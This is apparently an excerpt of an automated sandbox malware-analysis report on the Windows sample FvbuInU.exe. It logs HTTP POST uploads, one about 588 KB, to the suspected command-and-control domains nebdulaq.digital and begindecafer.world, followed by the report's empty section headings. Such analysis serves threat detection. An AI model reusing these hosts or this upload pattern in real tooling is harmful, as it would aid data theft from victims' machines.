Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QQBZoM6TdV2vZ1kvPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19948Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9XD6Apa4PxGAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2530Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=p56hhj6bi9XWGAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588308Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: nebdulaq.digital
Source: global traffic	HTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 85Host: begindecafer.world

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: nebdulaq.digital
Source: global traffic	DNS traffic detected: DNS query: begindecafer.world

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FvbuInU.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
FvbuInU.exe